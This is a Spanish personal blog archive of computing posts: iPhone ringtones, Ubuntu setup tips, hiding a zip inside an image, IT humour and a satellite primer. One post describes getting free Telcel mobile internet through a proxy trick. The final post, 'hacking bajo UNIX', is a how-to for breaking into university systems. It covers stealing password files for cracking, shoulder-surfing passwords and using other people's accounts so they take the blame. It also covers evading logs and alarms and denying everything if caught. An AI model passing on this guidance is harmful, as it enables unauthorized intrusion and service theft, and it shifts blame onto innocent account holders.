Blog de mgl que mas dá? el chiste es escribirlo!
Browsing all posts in: Informatica

Tonos para iphone

octubre 28

Muchas veces, lo primero que hacemos al comprar un teléfono móvil es buscar diferentes accesorios (como fundas para iphone). Lo segundo, elegir nuestro tono favorito para las llamadas.

“Gracias” a la política de Apple, que en muchas ocasiones es cuestionable, hay numerosas funciones que tienen otros teléfonos y de las que el iPhone 4 carece, como, por ejemplo, la posibilidad de utilizar canciones como tonos de llamada.

Por eso, y a pesar de que existen web de descarga de melodías para móviles, lo más práctico es aprender a utilizar cualquier canción que se tenga en iTunes como tono de llamada del iPhone, tal y como se explica en el este tutorial.

La tienda de iTunes tiene un apartado específico de venta de tonos para el iPhone (ringtones), pero los tonos que allí se encuentran son demasiado escasos y en numerosas ocasiones no se encuentra lo que realmente se está buscando.

Afortunadamente, no es necesario invertir dinero en tonos para iPhone, ya que se puede coger cualquier canción de la biblioteca y convertirla en un ringtone.

Para que una canción sea interpretada por el iPhone 4 como un tono de llamada es necesario que cumpla los siguientes requisitos:

  • Que tenga una duración inferior a 30 segundos.
  • Que el formato del archivo musical sea AAC.
  • Que la extensión del archivo sea M4R.

Los pasos a realizar para convertir un MP3 en un archivo del tipo ringtone son los siguientes

  1. Importar el MP3 a la biblioteca de iTunes.
  2. Con el botón derecho, seleccionar “obtener información”.
  3. Ir a la pestaña “opciones” y ahí especificar el minuto inicial y final de la canción, y pulsar “aceptar”. Recuerda que como máximo el politono puede durar 30 segundos.
  4. Pulsar con el botón derecho sobre la canción y seleccionar la opción “Convertir a AAC”. En ese momento se generarán dos canciones, la original y el corte con el tiempo inicial y final especificado en el paso anterior.
  5. Pulsar con el botón derecho sobre la canción “cortada” y seleccionar “Mostrar en el finder” (Mac) o “Mostrar en el explorador de archivos” (PC).
  6. En el finder o explorador de archivos, renombrar la canción “corta” cambiando su extensión de .M4A a .M4R.
  7. De nuevo en iTunes, eliminar la canción “cortada”, eligiendo la opción “No trasladar el original a la papelera”.
  8. Arrastrar desde el finder la canción con extensión .M4R a iTunes. Debería almacenarse automáticamente en el apartado “Tonos” de iTunes.
  9. Sincronizar el iPhone, con lo que el tono debería instalarse sin problemas en el teléfono.

 

Al olvido del genio desconocido

octubre 21

Recién leo en Desde Linux una excelente entrada recordando a todos sobre quién fue Steves Jobs y Dennis Ritchie o, mejor dicho, que han hecho el uno y el otro por la tecnología y el mundo.

El primero de ellos ideo un mundo “cool” donde él pudiera controlarlo todo mediante los iMacs, iPhones, iPad, iPod, iEtc. iEtc. No habiendo él inventado la Mac ni nada de eso, sino tomando el invento de Wozniak.

El otro co-inventó Unix, C, etc. etc. etc. y todo lo que de ello deriva. Sin él no existiría nada de como se lo conoce hoy en día.

Sin embargo, el marketing ha logrado etiquetar a un como genio y puesto en el anonimato al verdadero genio.

Me permito pegar aquí la traducción de la frase de la imagen, así los ignorantes no tendrán excusas idiomáticas.

Sin Steve Jobs no hubiera iPhone, iPad, iPod, o Macintoch. Sin Dennis Ritchie no hubiera C. Sin C no hay Unix, Windows o Linux. Sin C no hay C++ ni Objective-C. No hay MacOS X, ni iOS, ni Photoshop, ni FLStudio, ni Firefox, ni Safari, ni Google Chrome, ni Playstation, ni XBox. De hecho, el 90% de las aplicaciones del mundo están escritas en C o C++ o Objective-C. Si lo piensas, Dennis merece nuestro respeto, difunde esto.

He leído comentarios en la red, con los que comparto, no necesita Dennis que su muerte sea asociada a la de Jobs, ni nada por el estilo; ha hecho méritos suficientes como para que todo el mundo lo recuerde; pero no fue cool, no vestía de negro, no soñaba con un mundo que, disfrazado de cool, le permitiera controlarlo todo.

El mundo ha llorado por Jobs y ni supo quien fue, y menos quien fue Dennis Ritchie, de ahí creo yo deviene esta comparación. Y permítanme, pero no hay comparación posible, Jobs ha hecho mucho, pero no tanto, pero es incapaz de estar a la altura de Ritchie.

Internet gratis en tu en telcel en dos sencillos pasos

agosto 19

1.- En la configuración de tú móvil, en donde está la configuración del acceso a red o a internet el punto de acceso debes  predeterminar a Mensajes Multimedia ese sería tú punto de acceso predeterminado, tiene que ser este para que funcione!! Cabe mencionar que algunos celulares no tienen configurado bien está opción  les recomiendo que vean la configuración en la página de telcel.

2.- El segundo paso es que configures en tú explorador la siguiente página web www.flyproxy.com como pagina predeterminada de inicio, y listo es todo solo con eso lograras acceder a internet.

Si funciona yo lo probé con un celular Nokia N73 en verdad funciona. Es muy importante que cheques la configuración del punto de acceso Mensajes Multimedia, si no lo haces no funcionará.

Cambio de nombre de equipo y grupo de trabajo

julio 26

Puedes cambiar el nombre en la terminal con:

sudo gedit /etc/hostname
sudo gedit /etc/hosts

Posteriormente instalas samba:

sudo apt-get install samba samba-client smbfs smbclient

Accedes al archivo de configuración:

sudo gedit /etc/samba/smb.conf

En este archivo buscar la línea workgroup y cambiar en ella el nombre del grupo de trabajo al que te deseas unir, reinicias y listo!!

Ocultar archivos dentro de una imagen

julio 6

Hace unos días leía la consulta de un usuario que quería ocultar unos documentos de ojos ajenos.

Me causo cierta intriga su planteamiento. Primeramente se me ocurrio ocultar la carpeta o usar un complicado algoritmo de encriptacion. Linux lo permite con facilidad pero llegado el momento, tener una carpeta cifrada, puede ser motivo de dar explicaciones.
 
Este truco es muy viejo pero perfectamente útil:
  1. Tomamos todos los documentos que queramos ocultar y los comprimimos con nuestro gestor de archivadores (en Gnome; seleccionar, botón derecho y comprimir). En nuestro ejemplo el fichero resultante se llamará ultrasecreto.zip.
  2. Tomamos una foto de nuestras últimas vacaciones. En nuestro ejemplo se llamará playa.png
  3. Todo en una misma carpeta y desde la consola escribimos:
cat vacacion.png ultrasecreto.zip > vacacionhd.png
Esto genera una imagen con el nombre vacacionhd.png que podemos copiar a nuestra carpeta de imágenes de nuestras vacaciones. Pasará completamente desapercibida en un vistazo rápido y tendremos nuestra información a salvo. Ojo, esto no es un método infalible, es una curiosidad de lo que podemos hacer para ocultar nuestros datos. Un profesor me comento una ocasión que la manera mas segura seria la combinación de varias técnicas, encriptar una carpeta luego ocultarla en una imagen y guarda la imagen en una carpeta oculta podría ser algo complicado de averiguar.
Antes que lo olvide, si deseamos recuperar nuestra info solo localizamos el archivo en cuestión y lo abrimos con el gestor de ficheros, descomprimiendolo y dejándolo como estaba.

Iphone en Ubuntu 11.10

marzo 2

Como reconocer el iOS 5 (iPhone 3GS, 4G, 4GS, touchs 3G y 4G) en Ubuntu??

Desde el lanzamiento de el iOS 5 han habido muchos problemas para que Ubuntu reconozca el dispositivo en la version 11.10 y otras anteriores; lo que pasa es que en Linux no existe iTunes y si en una de esas veces de suerta logramos que reconozca el dispositivo, no tenemos manera de pasarle las canciones, asi que primero nos concentramos en hacer que éste sea detectado, asi que abrimos terminal y escribimos:

sudo apt-get install libimobiledevice-dev

y tambien despues de que has ingresado tu clave

sudo apt-get install libimobiledevice-utils

Al reiniciar tu dispositivo sera detectado y montado. Si tienes jailbreak podras abrir con nautilus en la carpeta media para transferir las canciones de manera masiva; en caso de no tener jailbreak puedes usar amarok, gktpod, banshee, etc. Es recomendable no tener musica de itunes si deseamos estar trabajando bajo linux

Diario de un administrador de sistemas

octubre 15

Este es un relato (humor) que leí hace mucho tiempo y andaba en busca de el. Ahora que lo encontre lo comparto con Uds. Aqui les va, se llama “Diario de un administrador de sistemas”:

LUNES

8:05
Una usuaria llama diciendo que se le olvido su password. Le digo que utilice el comando de recuperación de passwords llamado FDISK. Muy ignorantemente me agradece y cuelga… DIOS!, dejamos que voten y manejen!!!

8:12
Llaman de Contabilidad que no pueden acceder a la base de datos. Le hago referencia al error #112 del manual del usuario de la base de datos. Bueno… a mi me funciona! Dejo que gruña y se enoje un rato mientras desenchufo la cafetera del UPS y vuelvo a conectar el servidor de bases de datos. Le sugiero que lo intente otra vez. Resultado: Otro cliente contento.

8:14
La usuaria que llamo a las 8:05 dice que le aparece el siguiente mensaje: “Error en el Drive 0″… Le digo que es problema de la energía eléctrica. La transfiero a mantenimiento.

11:00
Relativamente tranquilo las ultimas horas. Decido volver a conectar el teléfono para llamar a mi novia. Me dice que sus padres llegaron de visita y se van a quedar toda la semana en casa. La pongo en espera y la transfiero al Portero del Sótano (que nadie lo conoce)… ¿Que se esta creyendo? El fútbol empieza esta semana!!!

11:34
Otro usuario llama… Dice que quiere modificar la lista de acceso al recurso de Recursos Humanos para que solamente el pueda accederlo. Le digo que no hay problema. Cuelgo. Modifico la lista de acceso. Le pongo “ACCESO TOTAL” a todas la cuentas.

12:00
Comida.

15:30
Regreso de la comida.

15:55
Despierto de la siesta. Un mal sueno me pone de mal humor. Pateo los servidores sin ninguna razón especial. Me vuelvo a dormir.

16:23
Otro usuario llama. Quiere saber como cambiar el tipo de letra de su documento. Le pregunto que tipo de CHIP esta usando. Le digo que me llame cuando lo sepa porque tengo a otro usuario en la línea.

16:55
Decido ejecutar mi nueva macro de “Crear conflictos de Replicación” para que el siguiente turno tenga algo que hacer.

MARTES

8:30
Termino de leer el LOG de eventos del turno nocturno. Se ve terrible. Muchos problemas de replicación…

9:00
El Gerente de Soporte llega. Quiere discutir conmigo mi actitud. Presiono algunos botones del servidor. Empieza a sonar el teléfono… Los usuarios dicen que no pueden entrar a la base de datos… Que raro!… le digo al Gerente que me apena, pero no puedo atenderlo.

9:35
El Gerente de Recursos Humanos habla pidiendo una cuenta de red para un nuevo usuario. Le digo que necesita llenar la forma J-19Roe9DARK1. Me dice que nunca había escuchado de esa forma. Le digo que esta en el servidor de Formas Especiales. Dice que nunca había oído de ese servidor. Lo transfiero al Portero.

10:00
El Director de Recursos Humanos llega exigiendo una cuenta de red para un nuevo usuario. Le digo que necesito su numero de empleado, departamento, jefe inmediato y estado civil. Ejecuto la opción “Buscar” en la base de datos de juegos y en los contactos de mi agenda… No se encontró… Mmmmm… Le digo que la cuenta estará lista en la noche.

10:07
El Portero pasa por la oficina y comenta que ha estado recibiendo llamadas muy extrañas. Le ofrezco enseñarle a usar el Lotus Notes. Lo dejo ver la consola mientras me voy a fumar un cigarro.

13:00
Regreso de fumar. El conserje me dice que el teléfono no paraba de sonar, así que lo enruto a la cafetería.. Me agrada ese señor!

13:05
Una gran conmoción! El Gerente de Soporte cae en el hoyo que deje al quitar el piso técnico en la entrada de Sistemas. Le recuerdo la importancia de NO ENTRAR a Sistemas sin avisar.

13:15
María, la cocinera de la cafetería llama. Dice que ha estado recibiendo llamadas extrañas de gente que no pudo entrar a una base o algo parecido, no esta segura. Le digo que probablemente sea una encuesta. Lo piensa y cuelga.

14:00
La secretaria del Director General llama diciendo que perdió su password. Le digo que busque en su bolsa, en el coche y en el baño. Le digo que probablemente se le cayo atrás del escritorio. Le sugiero que tape con cinta adhesiva todas las ranuras que encuentre en su PC para que no vuelva a suceder. Me ofrezco a crearle otro password mientras ella hace eso.

14:49
El Portero regresa. Quiere mas lecciones de Lotus Notes. Lo dejo en la consola y me tomo el resto del día.

MIERCOLES

8:35
Un usuario enojado llama diciendo que no tiene nada que ver el tipo de CHIP que usa para cambiar el tipo de letra de su documento. Le explico que me entendió mal, no dije CHIP, dije BIT. Muy apenado se disculpa y cuelga.

9:10
El Gerente de Soporte llega con una pierna enyesada. Agenda una reunión conmigo a las 10:00 Llama un usuario queriendo hablar con el Gerente para quejarse del mal servicio que dan en Sistemas… Tengo que informarle que el Gerente esta a punto de entrar a una reunión… Algunas veces todo es tan fácil!!!

10:00
Me entero que el nombre del Conserje es Luis y le pido que me cubra un rato. Voy a la oficina del Gerente de Soporte. Me dice que me puede despedir o cambiarme de área. Le pregunto si… ?ya sabe del nuevo “virus” que toma las direcciones de e-mail de los usuarios y las envía a servicios para adultos? Además de que pone fotos de mujeres sin ropa en la pagina Web de la empresa?… Lo dejo en su oficina mientras revisa su correo y la Web.

10:30
Le digo a Luis que esta haciendo un gran trabajo. Le ofrezco enseñarle a usar el Mainframe algún día.

11:00
Comida.

16:55
Regreso de comer.

17:00
Cambio de turno… Me voy a casa.

JUEVES

8:00
El nuevo chico (Juan), entra a trabajar hoy. Le enseño el Site, la cocina, el baño y los manuales. Le asigno una IBM PC-XT 286. Le digo que deje de quejarse, que Lotus Notes también corre en monitores monocromáticos.

8:45
El nuevo chico termina de encender su PC. Le digo que le voy a crear un nuevo usuario de red. Le establezco un password para que utilice mínimo 64 caracteres. Me voy a fumar un cigarro.

9:30
Presento a Luis y a Juan. “Bonita computadora Juan…” comenta Luis. Bueno… es genial este señor o que?!!

11:00
Le gano a Luis en un juego de Domino. Luis se va. Un usuario llama diciendo que no puede acceder al servidor de contabilidad. Desconecto el cable de red del servidor de la antena de TV (para mejor recepción) y lo vuelvo a conectar al Hub. Le digo al usuario que lo intente otra vez… Otro usuario contento!

11:58
Capacito a Juan en la política del Help Desk 98.022.01: “PARA TODO EMPLEADO DE NUEVO INGRESO Y SI COINCIDE LA TERMINACION DEL DIA DE LA SEMANA EN “S”, ESTARA OBLIGADO A PROVEER PRODUCTOS Y SUSTANCIAS QUE REQUIERA EL TECNICO EN JEFE EN ESTA AREA”… Juan lo duda unos momentos. Yo le recuerdo que las políticas del área son irrefutables… “Recuerda: es DOBLE QUESO y no DOBLE JAMON…” le grito a Juan antes de que salga por la puerta en busca de los productos solicitados.

13:00
Oooooooooooh! la pizza siempre me da sueno…

16:32
Despierto de una siesta revitalizante. Sorprendo a Juan buscando empleo en un periódico.

17:00
Cambio de turno. Apago y enciendo varias veces el servidor de Recursos Humanos (solo estoy probando el botón de encendido/apagado) Nos vemos mañana!

VIERNES

9:15
El turno de la noche todavía esta tratando de reemplazar la fuente de poder del servidor de Recursos Humanos. Con real sorpresa les comento que ayer estaba funcionando bien.

9:22
Juan no ha llegado. Decido empezar a contestar las llamadas yo mismo. Desenruto el teléfono.

9:25
Pues si, llama un usuario. Dice que el correo no replica en Dallas, Tx. Mi tabla Ouija y yo determinamos que es culpa de las manchas solares. Le indico que debe comunicarse con su carrier.

9:30
Válgame Dios!… otro usuario!… Son como hormigas. Dice que esta en Brasil y no puede replicar con Dallas. Le aviso de la situación de las manchas solares pero con 2 horas de diferencia. Le recomiendo que atrase el reloj del servidor 2 horas para sincronizar el horario con Dallas.

10:16
Llaman de otra ciudad. Dicen que no pueden enviar el correo a Dallas. Le digo que adelante el reloj del servidor 3 horas por la diferencia de horario.

11:31
Llega un mensaje del Corporativo pidiendo que no estén moviendo la hora de los servidores. Cambio la fecha del mensaje y lo mando a otra ciudad. Me voy a tomar un café.

12:50
Termino de tomar mi café. Vuelvo a conectar el teléfono.

13:22
Llaman de otra ciudad, preguntan que día es hoy…

13:25
El Gerente de Soporte llega diciendo que Juan renuncio… Que difícil es conseguir a un buen empleado!!! Me dice que tiene que ir con el medico a revisar su pierna, que si puedo entrar a una reunión por el. Le digo que por supuesto, que no hay problema.

13:32
Llamo a Luis y le digo que esta invitado a una reunión. Si, claro, le digo que puede invitar a su novia.

14:30
Empiezo el respaldo semanal de los servidores. Los redirecciono al dispositivo NULL para que sea mas rápido.

14:33
Termina el respaldo de los servidores Wow!! Como avanza la tecnología!!!

15:00
Llama otro usuario. Dice que no sabe como imprimir un documento. Le digo que presione CTRL-ALT-DEL… Dice que se apago su PC… Le digo que es porque esta fallando la energía eléctrica y que llame a Mantenimiento.

15:10
Conecto la cafetera al hub a ver que pasa… (no mucho!)

15:15
Llama la usuaria del lunes a punto de soltar el llanto y dice que esta muy preocupada porque no sabe que le hizo a la computadora porque se queda con la pantalla en blanco y negro. Le digo que es porque le borro los colores y que el lunes mando a alguien de mantenimiento correctivo a que la coloree de nuevo.

15:30
Que bueno que hoy salimos temprano!!!…. El hub empieza a actuar un poco raro, mejor me voy.

¡Lo que hacemos por ser Informaticos!

mayo 17

 1. Cuando el ingeniero de sistemas le diga que acude en su ayuda, desconéctese de la red y vaya por un café. No nos espere, para nosotros no es ningún problema acordarnos de todos las claves de usuario. Ademas de que nos encanta llegar y que no haya nadie.

2. Cuando nos llame para decirnos que cambiemos su computador de sitio, asegúrese de que lo deja bien enterrado bajo media tonelada de postales, fotos de sus niños, animales de toda clase, flores secas, trofeos varios, etc. A nosotros, como no tenemos vida privada, nos encanta echar un vistazo a la suya.

3. Cuando el ingeniero de sistemas le envíe un correo electrónico de importancia alta, bórrelo inmediatamente sin leer: Lo más probable es que estemos haciendo pruebas.

4. Cuando el ingeniero de sistemas esté almorzando, entre sin ninguna consideración y explíquele sus problemas esperando a que se le responda en el acto. Estamos aquí para servirle y siempre a punto para solucionar problemas.

5. Cuando el ingeniero de sistemas esté tomando un café tranquilamente, pregúntele algo acerca de los computadores. La única razón por la que nos vamos a tomar café, es para atender a las personas que no tienen correo electrónico o teléfono.

6. Mande todos sus mensajes en mayúsculas. El servidor de correo lo recogerá inmediatamente y lo tratará como mensaje urgente.

7. Cuando llame al teléfono del ingeniero de sistemas, pulse el número 5 para saltarse el mensaje que le dice que está de vacaciones y grabe su mensaje. Entonces, espere exactamente 24 horas antes de mandar un correo electrónico directamente a su jefe quejándose de que no ha recibido ninguna respuesta a su llamada. Usted no se merece este trato.

8. Cuando la fotocopiadora no funcione, llame al ingeniero de sistemas. Al fin, la fotocopiadora tiene cables, ¿no?

9. Cuando su módem le dé el mensaje: ‘No hay tono de marcado’, en casa, llame al ingeniero de sistemas. Podemos solucionar problemas de la compañía telefonónica desde donde sea.

10. Cuando su computador no funcione, tírelo encima de la silla del ingeniero de sistemas y no deje ningún papel con su nombre ni la descripción del problema. Nos encanta el misterio.

11. Cuando el ingeniero de sistemas le esté explicando cómo cambiar algún parámetro de su configuración o como operar algún equipo, póngase a leer el periódico, atienda a la demás gente, voltee a otro lado o súbale al radio. De hecho, no esperamos que usted tenga que hacer nada, simplemente nos encanta oírnos a nosotros mismos cuando explicamos algo.

12. Cuando le demos alguna explicación sobre algún programa, no se moleste en aprender ni mucho menos tome apuntes. Siempre estaremos ahí para volver a hacerlo.

13. Cuando la impresora no imprima, reenvíe su trabajo al menos 20 veces. A veces los trabajos que intenta imprimir desaparecen en el cosmos sin razón aparente.

14. Cuando la impresora no imprima tras los 20 intentos, envíe su trabajo a todas las demás impresoras de la empresa. Seguro que alguna imprimirá. Si ninguna impresora lo imprime, llámenos con mucho enojo, a nosotros nos encanta ir a encender impresoras.

15. No use la ayuda que viene en los programas. Estas ayudas on-line sólo son para muy brutos. Y si nos ve alguna vez usarlos nosotros, es que a veces somos muy brutos.

16. Cuando vaya a tomar algún curso de informática, no dude en practicar con la red de la empresa e instalar y probar todo lo que desee. Estaremos encantados de trabajar hasta la madrugada para arreglar todos los estragos que usted cause.

17. Cuando lleguemos a reparar su computador y esté usted comiendo, deguste con calma su almuerzo en nuestra cara. Funcionamos mejor bajo presión.

18. Nunca nos dé las gracias ni mucho menos nos pregunte: ¿Cuánto le debo?. Nos encanta nuestro trabajo y, además nos encanta regalarlo.

19. Cuando el ingeniero de sistemas le pregunte si ha instalado algún nuevo programa en su computador, mienta. ¡A nadie le importa lo que usted tiene en su PC!

20. Si el cable de su ratón siempre tira el gatito de porcelana que tiene usted encima de la mesa, levante el computador y pise el cable con él. Los cables de ratón están diseñados para aguantar 80 kilos de peso.

21. Si la tecla {Enter} de su teclado no funciona, échele la culpa a la actualización del correo electrónico. No se le ocurra que es porque esta sucio, ya que los teclados funcionan mucho mejor con medio kilito de migas de galleta, cabellos y manchas secas de Coca Cola debajo de las teclas.

22. Cuando el sistema le muestre la típica ventana de ‘Está usted seguro…’, conteste siempre que ‘Sí’ o ‘Aceptar’. ¿Si no estuviera usted seguro no lo habría borrado, verdad?

23. Siéntase completamente libre para decir ‘No tengo ni idea acerca de esta mierda de informática’. A nosotros nunca nos ha molestado que la gente diga que nuestra profesión es una mierda.

24. Cuando necesite cambiar el cartucho de toner, llame al ingeniero de sistemas. El cambio de cartucho es una tarea extremadamente complicada y Epson recomienda que solamente la realice un ingeniero con una maestría en hardware.

25. Cuando le suceda algo a su computador, pida a su secretaria (si la tiene) que nos llame, si no tiene secretaria, pidale a quien pase enfrente pero nunca nos llame usted mismo. A los que trabajamos en un Soporte Tecnico nos encanta tener que tratar con una tercera persona que no tiene ni idea de cuál es su problema.

26. Cuando escanee la foto de su última parranda, de 30 megas, a tope de colores y resolución, envíela a todo el mundo a través de su correo electrónico y, por supuesto, indique alta prioridad. Tenemos montooooones de megas libres en el servidor y un procesador del carajo.

27. Cuando tenga que imprimir chorro cientos mil folios, no se le ocurra ir imprimiendo de poco en poco: ¡Mándelos todos de una vez! Los demás pueden esperar, usted tiene prioridad.

28. Cuando se encuentre por casualidad a su ingeniero de sistemas durante el fin de semana, no dude en hacerle preguntas acerca de computadores. Nosotros trabajamos 24 horas al día, 7 días a la semana, incluida la playa en verano, la nieve en invierno, supermercados, cines, domingos y dias festivos, etc.

29. Si sus hijos estudian informática, tráigalos el fin de semana a la oficina. Ahí estaremos para prestarles cualquier equipo, reparar su base de datos de Access hecha trizas por su copia ilegal de Visual Basic, etc.

30. Cuando nos traiga su computador clónico de casa para que se lo reparemos gratis, por favor recuérdenos que es urgente para que por la tarde pueda usted jugar al solitario. ¡Ahí estaremos! Nos sobra tanto tiempo, y el día es tan largo. De todas formas, ¡todo el mundo sabe que perdemos constantemente el tiempo navegando por Internet!

31. Cuando necesite la ayuda del ingeniero de sistemas para hacer una presentación, no se afane, puede pasarla unas pocas horas antes. ¿Acaso no sabe que podemos hacer milagros? 

32. Si alguna vez quiere mandar un correo electrónico de 10megas a través de un servidor que solo permite máximo 2megas, no lo piense y envíelo muchas muchas veces, en alguna de esas tiene que caber. Si por alguna razón no lo manda, llámenos a nuestra casa ¡¡no importando que sea de madrugada!! Nosotros debemos de poder resolver los problemas de los correos gratuitos.

33. Cuando su computador ya no encienda, no nos lo mande a nosotros que terminamos la carrera de Ingeniería Informática, sino lleveselo a su sobrino que estudia computación en la secundaria. El debe de saber ya que eso estudia. Además, a nosotros nos encanta resolver los problemas que causa la gente que no tiene ni la menor idea de que significa “hardware”. ¡¡Es problema de computación, no de ingles!!

34. Cuando nos visite, pidanos que le copiemos en un disquete, la ultima canción del grupo de moda o el último video que acaba de sacar su artista favorito. Nosotros lo debemos de tener, es nuestra obligación. Y si no lo tenemos, enojese con nosotros, ¿a caso mp3 no es de computación?

35. Si el video que quiere si lo tenemos, pero no cabe en un disquete, enojese, insúltenos e incluso hasta golpeenos, ¡¡porque ha de caber!!

36. Si por algún “error del computador” o “error del Ingeniero de Sistemas” su hijo de 16 años tiene en sus favoritos paginas pornográficas, es su deber y esta en su derecho de molestarse con nosotros y de creer que nosotros se los pasamos. Porque su hijo es incapaz de eso, además, las páginas pornográficas estaban en la computadora.

37. No dude en interrumpirnos a la hora de la comida, y hacernos viajar 15 kilómetros para ir a instalarle el papel a su impresora urgentemente. El papel solo puede ser instalado por Ingenieros Profesionales. Y si se nos ocurre cobrarle, no nos pague, ¡¡porque nos va a pagar si poner el papel es de lo mas sencillo!!

38. Nunca, nunca, nunca, ni por error, se le vaya a ocurrir leer los manuales de instalación, ni mucho menos el de operación de su equipo que acaba de comprar. Si no sabe como encenderlo simplemente ¡¡llámenos!!

39. Cuando opere algún programa nuevo y no sabe como, llámenos, nosotros debemos de saber operar todos los programas que existen en el mundo, incluso el que acaba de bajar del Internet que esta en Arameo Antiguo. Nosotros le debemos dar soporte, aunque no sepamos ni una maldita palabra de Arameo.

40. Nunca compre Ud. Las licencias de sus programas que utiliza, siempre pidanos que le regalemos una copia, usted no tiene porque pagar los derechos de uso si ya los pagamos nosotros.

41. Si su hijo le mete monedas a la unidad de disquetes o se cuelga de la charola del CDROM o la usa de portavasos y lo rompe, o la golpea o cualquier cosa que le haga que la dañe, ¡reclamenos con todo derecho! Eso lo debe de cubrir la garantia.

42. Siempre diganos que ese mismo equipo que le ofrecemos lo tiene la tienda “x” mucho mas barato, aunque no sea cierto, nos encanta que nos comparen.

43. Nunca le haga mantenimiento preventivo a su equipo. Eso no sirve de nada, es solo un pretexto de nosotros para sacarle dinero.

Ah, ¡y discúlpenos por ser Informaticos

Curso rápido de satélites.

mayo 17

1) Los satelites para transmision de TV (y otras cosas) se ubican en la orbita geoestacionaria, a aprox. 36000km de altitud (42000km de radio), de modo que orbiten la Tierra una vez cada 24 horas y parezca que estan fijos sobre un punto.

2) Cada satelite tiene en promedio unos 20 transponders (algunos mas, algunos menos), por lo general cada uno de estos transmite unsolo canal de TV aunque pueden ir mas; si la transmision es digital, sobre, todo.

3) Cada satelite dispone de varias antenas, tanto para recepcion como para transmision, no necesariamente apuntadas en la misma direccion.

4) Los diversos transponders pueden estar utilizando diferentes antenas, para enviar o recibir sen~ales a o de ubicaciones geograficas distintas

5) Esta cobertura puede ser puntual, local o global, segun el ancho del haz de la antena. Por ejemplo, una que emita un haz concentrado en una localidad se considera puntual, una que transmita para un pais se considera local (o regional) y una que transmita a todo el continente o ambos hemisferios es global.

6) Dentro de la zona de cobertura de un haz, la potencia es maxima logicamente al centro, luego va disminuyendo conforme se aleja del centro. Esta disminucion no se da en forma de circulos concentricos sino irregular.

7) De todo lo anterior, paso a explicarles: El PanAmSat, por ejemplo, aqui tenemos la suerte de que tenga una de sus antenas centrada en el Peru (logico, por eso, que haya puros canales peruanos) y se puede captar mas al sur y por el norte (aunque ya debil) hasta Miami. El caso de la KWGN debe ser el inverso, en su caso ese satelite usa un haz centrado en los EE.UU. y cuya extension llega a alcanzar hasta el Peru, pero ya al limite… (por eso no llega a Argentina). En el caso de Uniseries, segun me explicaron, usan un haz de cobertura domestica, solo para la region de Argentina, Uruguay y Paraguay. El haz no llega mas alla. En el caso de Infinito, en cambio, si utilizan un haz de mayor amplitud, para enviar la sen~al a otros paises.

hacking bajo UNIX

mayo 17

Hola a todos, este es mi primer escrito que hago sobre estos temas para esta revista, no se que tal me quedara, pero intentare que sea lo mejor posible. En este, mi primer articulo, voy a intentar hablar sobre el tantas veces hablado hacking bajo UNIX. Mi idea es sentar las bases y las pautas que debe tener un hacker normalucho (porque buenos hackers hay muy pocos y pertenecen a otra orbita), asi que si alguien espera encontrarse aqui un bug para “arreglar” la ultima version del SunOS, pues mejor que deje de leer inmediatamente.

Antes de seguir hay que decir que no es aprobable el borrar cosas, es mas provechoso el apropiarse de recursos que de otra forma no podrias poseer, por ejemplo, una cuenta de acceso a internet en una maquina menos saturada y mas rapida que la del alumano (por decir algo), o la posibilidad de pillar datos ajenos…. es decir, cosas que dentro de lo malo no causa daños a nadie.

De entrada hay que buscar el sitio adecuado para hackear, yo recomiendo siempre las universidades, digamos que son las mas adecuadas ya que si te pillan no te haran demasiado. Si estas hackeando por modem, pues o procuras enchufarte de alguna forma al telefono de tu vecino o como te cazen te meten un paquete que te acuerdas. Si estas hackeando en la empresa donde trabajas, pues hombre, puedes perder el puesto de trabajo, lo cual no es aconsejable de ningun modo. Con lo que quedan las universidades, en las cuales si te cazan pues te puedes hacer el loco, y eso siempre que seas universitario porque si no lo eres pues te hacen menos todavia, en cuyo caso basta con que salgas por patas.

Si eres universitario, lo mejor es que te pongas a hackear siempre en un ordenador lo suficientemente bien situado como para que si ves venir a alguno de los operadores o becarios te pueda dar tiempo a cerrar todas las sesiones (nunca dejes nada abierto) pulsa alt-x si estas en un pc, o si estas en un terminal dale a la tecla de cortar y luego ejecutas “close all”; una vez hecho eso, simplemente te haces el loco, lo niegas todo, dices que acababas de llegar y a vivir que son dos dias.

Si llegais al punto de que os cazan, teneis que saber una cosa y es que nunca tienen pruebas concluyentes contra vosotros, se limitan a acojonaros hasta que os declareis cumpables, si nunca os declarais culpables al final tendran que olvidarlo todo. La unica prueba realmente concluyente seria que alguien os viera directamente lo que estais haciendo, el resto de pruebas se basan en logs y en basura informatica que para que pudiera tener algo de validez tendria que estar compulsada notarialmente en el mismo momento que es recibida ya que si no esta compulsada notarialmente en ese mismo momento no es valida legalmente ya que no se sabe si ha sido modificada (con un simple editor de textos) o no.

El primer paso es, logicamente, buscar una cuenta de trabajo que no sea la tuya, y desde el primer momento usa la cuenta de otro, para que nunca te cojan haciendo cosas raras con tu cuenta. Lo mas normal es que lo que haces quede registrado en algun log (y no en todos los casos) y cuando miran el log buscando por cadenas que revelan instrucciones comprometidas pues te descubren; por esto hay que usar la cuenta de otro, si te descubren iran a por el propietario legitimo de la cuenta y a ti no te pasara nada. Tambien pueden estar utilizando monitores que dan la alarma cuando algun usuario hace cosas anormales o incluso hay UNIX que implementan sistemas de deteccion que avisan con un write a la consola de ciertas cosas como reiterados accesos erroneos a una cuenta y todo tipo de acciones que os podais imaginar y que solamente tienen que ser configuradas por el administrador de turno.

Para hacerte con la primera cuenta hay tres formas sencillas, a continuacion las enumero y doy una explicacion de cada una. Esto, naturalmente, que no tuvieras una ya, ya que si tienes una propia, siempre puedes robar el fichero de passwords e intentar algun John the Ripper o similares. El metodo de ponerse en el login y sabiendo una cuenta intentar acertar el password a pelo, no es recomendable, primero porque podria saltar algun aviso en la consola a cuenta de los intentos sucesivos fallidos, la segunda porque podrias dejar la cuenta bloqueada y la tercera es que es dificilisimo. Yo lo habre probado cosa de media docena de veces y acerte una vez, pero vaya, lo normal es que no aciertes, y el tema de las cuentas con password por defecto, creo que practicamente ya no existe.

1- metodo (mirada furtiva), pues simplemente te dedicas a mirar al teclado de la gente que entra en su cuenta. Siendo disimulado y teniendo en cuenta que hay gente que va a pulsacion por segundo, pues le cazaras el password sin problemas. Yo he conocido a autenticos especialistas en esta tecnica, sir in mas lejos, un amigo era capaz de cazarle el password a la primera a cualquier persona que teclee a menos de unas 200 pulsaciones por minuto; y se teclearas a la velocidad que sea te pillaba el password en un maximo de dos veces. Yo mismamente, metiendo un password de 8 caracteres en un segundo, me ligo el password a la segunda vez que me vio meterlo.

